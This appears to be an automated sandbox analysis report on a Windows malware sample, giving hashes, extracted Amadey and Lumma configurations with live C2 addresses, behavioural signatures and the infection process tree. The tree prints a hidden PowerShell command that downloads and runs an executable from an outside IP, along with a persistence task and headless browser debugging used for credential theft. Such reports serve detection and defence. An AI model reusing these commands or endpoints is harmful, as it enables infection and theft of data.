Analysis

  • max time kernel
    140s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250313-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/04/2025, 10:19

General

  • Target

    2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    23573a8db4c1b7f45d67aa96325236dd

  • SHA1

    f874c2a1450e1455e616282f4da3b2ff715967b0

  • SHA256

    2455cf14f9efe4b234215f89b672996d04d219d87a1d73aa1eb4fd497510f3e5

  • SHA512

    4bcbfc053d8c96233234b29ac9e237f6e9eb3dfd767de4d747323ee42a0cbfbef670270562741106cc4f3480e6ae695466e9f5d5316aea80e2de13d5ce841e43

  • SSDEEP

    24576:aqDEvCTbMWu7rQYlBQcBiT6rprG8a0fu:aTvC/MTQYxsWR7a0f

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://wstarcloc.bet/GOksAo

https://advennture.top/GKsiio

https://atargett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 12 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Sets service image path in registry 2 TTPs 7 IoCs
  • Uses browser remote debugging 2 TTPs 8 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 30 IoCs
  • Identifies Wine through registry keys 2 TTPs 6 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
  • Loads dropped DLL 36 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 4 IoCs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Suspicious use of SetThreadContext 23 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 10 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 35 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 64 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 21 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies registry class 14 IoCs
  • Runs ping.exe 1 TTPs 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 5 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 20 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:5464
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn kPYo1maAEke /tr "mshta C:\Users\Admin\AppData\Local\Temp\7SwArKU7E.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2848
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn kPYo1maAEke /tr "mshta C:\Users\Admin\AppData\Local\Temp\7SwArKU7E.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:3056
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\7SwArKU7E.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3692
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWIKER2PAVEKSVTXE0Z4QDPLE3HMBSEF.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:5048
        • C:\Users\Admin\AppData\Local\TempRWIKER2PAVEKSVTXE0Z4QDPLE3HMBSEF.EXE
          "C:\Users\Admin\AppData\Local\TempRWIKER2PAVEKSVTXE0Z4QDPLE3HMBSEF.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:5092
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3548
            • C:\Users\Admin\AppData\Local\Temp\10475710101\AfkeY2q.exe
              "C:\Users\Admin\AppData\Local\Temp\10475710101\AfkeY2q.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1016
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                7⤵
                  PID:4008
              • C:\Users\Admin\AppData\Local\Temp\10480540101\ibC8xs1.exe
                "C:\Users\Admin\AppData\Local\Temp\10480540101\ibC8xs1.exe"
                6⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:5088
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pwwwoc5s\pwwwoc5s.cmdline"
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2868
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF01D.tmp" "c:\Users\Admin\AppData\Local\Temp\pwwwoc5s\CSC4027B284692744958D68DA9C18F35FD4.TMP"
                    8⤵
                      PID:2564
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                    7⤵
                      PID:968
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      7⤵
                      • Downloads MZ/PE file
                      • Accesses Microsoft Outlook accounts
                      • Accesses Microsoft Outlook profiles
                      • Suspicious use of SetThreadContext
                      • Drops file in Program Files directory
                      • System Location Discovery: System Language Discovery
                      • Checks processor information in registry
                      • Suspicious behavior: AddClipboardFormatListener
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SetWindowsHookEx
                      • outlook_office_path
                      • outlook_win_path
                      PID:4356
                      • C:\Windows\system32\rundll32.exe
                        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                        8⤵
                        • Modifies registry class
                        • Suspicious use of FindShellTrayWindow
                        PID:3060
                      • C:\Windows\system32\rundll32.exe
                        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                        8⤵
                        • Modifies registry class
                        • Suspicious use of FindShellTrayWindow
                        PID:5544
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        --restore-last-session --remote-debugging-port=9223 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"
                        8⤵
                        • Uses browser remote debugging
                        • Enumerates system info in registry
                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                        • Suspicious use of FindShellTrayWindow
                        PID:3956
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffdc8f9dcf8,0x7ffdc8f9dd04,0x7ffdc8f9dd10
                          9⤵
                            PID:5636
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2020,i,15416560791368690032,18128962976561682742,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2012 /prefetch:2
                            9⤵
                              PID:5612
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2276,i,15416560791368690032,18128962976561682742,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=1304 /prefetch:3
                              9⤵
                                PID:5680
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2516,i,15416560791368690032,18128962976561682742,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2512 /prefetch:8
                                9⤵
                                  PID:5620
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3308,i,15416560791368690032,18128962976561682742,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3304 /prefetch:1
                                  9⤵
                                  • Uses browser remote debugging
                                  PID:4876
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3288,i,15416560791368690032,18128962976561682742,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3284 /prefetch:1
                                  9⤵
                                  • Uses browser remote debugging
                                  PID:3468
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4100,i,15416560791368690032,18128962976561682742,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4068 /prefetch:2
                                  9⤵
                                  • Uses browser remote debugging
                                  PID:4288
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4640,i,15416560791368690032,18128962976561682742,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4644 /prefetch:1
                                  9⤵
                                  • Uses browser remote debugging
                                  PID:2564
                              • C:\Windows\system32\rundll32.exe
                                "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                8⤵
                                • Modifies registry class
                                • Suspicious use of FindShellTrayWindow
                                PID:4028
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                --restore-last-session --remote-debugging-port=9225 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default"
                                8⤵
                                • Uses browser remote debugging
                                • Enumerates system info in registry
                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                • Suspicious use of FindShellTrayWindow
                                PID:3528
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x248,0x7ffdc884f208,0x7ffdc884f214,0x7ffdc884f220
                                  9⤵
                                    PID:3248
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2268,i,13598127440426155224,7775967567604084429,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2260 /prefetch:3
                                    9⤵
                                      PID:3220
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2228,i,13598127440426155224,7775967567604084429,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:2
                                      9⤵
                                        PID:4860
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2684,i,13598127440426155224,7775967567604084429,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2680 /prefetch:8
                                        9⤵
                                          PID:384
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3560,i,13598127440426155224,7775967567604084429,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3556 /prefetch:1
                                          9⤵
                                          • Uses browser remote debugging
                                          PID:4408
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3576,i,13598127440426155224,7775967567604084429,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3564 /prefetch:1
                                          9⤵
                                          • Uses browser remote debugging
                                          PID:2084
                                      • C:\Windows\system32\rundll32.exe
                                        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                        8⤵
                                        • Modifies registry class
                                        • Suspicious use of FindShellTrayWindow
                                        PID:3792
                                      • C:\Windows\system32\rundll32.exe
                                        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                        8⤵
                                        • Modifies registry class
                                        • Suspicious use of FindShellTrayWindow
                                        PID:2764
                                      • C:\Windows\system32\rundll32.exe
                                        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                        8⤵
                                        • Modifies registry class
                                        • Suspicious use of FindShellTrayWindow
                                        PID:5980
                                      • C:\Windows\system32\rundll32.exe
                                        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                        8⤵
                                        • Modifies registry class
                                        • Suspicious use of FindShellTrayWindow
                                        PID:2348
                                      • C:\Windows\system32\rundll32.exe
                                        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                        8⤵
                                        • Modifies registry class
                                        • Suspicious use of FindShellTrayWindow
                                        PID:13712
                                      • C:\Windows\system32\rundll32.exe
                                        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                        8⤵
                                        • Modifies registry class
                                        • Suspicious use of FindShellTrayWindow
                                        PID:6636
                                      • C:\Windows\system32\rundll32.exe
                                        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                        8⤵
                                        • Modifies registry class
                                        • Suspicious use of FindShellTrayWindow
                                        PID:7088
                                      • C:\Windows\system32\rundll32.exe
                                        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                        8⤵
                                        • Modifies registry class
                                        • Suspicious use of FindShellTrayWindow
                                        PID:5296
                                      • C:\Windows\system32\rundll32.exe
                                        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                        8⤵
                                        • Modifies registry class
                                        • Suspicious use of FindShellTrayWindow
                                        PID:11932
                                      • C:\Windows\system32\rundll32.exe
                                        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                        8⤵
                                        • Modifies registry class
                                        • Suspicious use of FindShellTrayWindow
                                        PID:4576
                                      • C:\Windows\system32\rundll32.exe
                                        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                        8⤵
                                        • Suspicious use of FindShellTrayWindow
                                        PID:11580
                                      • C:\Windows\system32\rundll32.exe
                                        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                        8⤵
                                          PID:2800
                                    • C:\Users\Admin\AppData\Local\Temp\10480910101\DgQBvwg.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10480910101\DgQBvwg.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      • Suspicious use of SetThreadContext
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3184
                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d2gvtuvg\d2gvtuvg.cmdline"
                                        7⤵
                                          PID:4068
                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2759.tmp" "c:\Users\Admin\AppData\Local\Temp\d2gvtuvg\CSC425564E22D9641229ED8895A875E88F7.TMP"
                                            8⤵
                                              PID:1948
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                            7⤵
                                              PID:2916
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                              7⤵
                                                PID:3340
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                7⤵
                                                  PID:2104
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                  7⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:4480
                                              • C:\Windows\SysWOW64\msiexec.exe
                                                "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10481850271\ArFLIYD.msi" /quiet
                                                6⤵
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:3728
                                              • C:\Users\Admin\AppData\Local\Temp\10491920101\Pgpx359.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10491920101\Pgpx359.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                PID:5608
                                              • C:\Users\Admin\AppData\Local\Temp\10491970101\8371767ff6.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10491970101\8371767ff6.exe"
                                                6⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Checks BIOS information in registry
                                                • Executes dropped EXE
                                                • Identifies Wine through registry keys
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • System Location Discovery: System Language Discovery
                                                PID:5844
                                              • C:\Users\Admin\AppData\Local\Temp\10491980101\Pgpx359.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10491980101\Pgpx359.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                PID:3724
                                              • C:\Users\Admin\AppData\Local\Temp\10492010101\ibC8xs1.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10492010101\ibC8xs1.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • Adds Run key to start application
                                                • Suspicious use of SetThreadContext
                                                PID:676
                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jyg2hzks\jyg2hzks.cmdline"
                                                  7⤵
                                                    PID:2848
                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9CC8.tmp" "c:\Users\Admin\AppData\Local\Temp\jyg2hzks\CSCD9EA5F39DBE94466B8E0375318E97DA.TMP"
                                                      8⤵
                                                        PID:4008
                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                      7⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:5648
                                                  • C:\Users\Admin\AppData\Local\Temp\10492020101\DgQBvwg.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10492020101\DgQBvwg.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Adds Run key to start application
                                                    • Suspicious use of SetThreadContext
                                                    PID:5612
                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
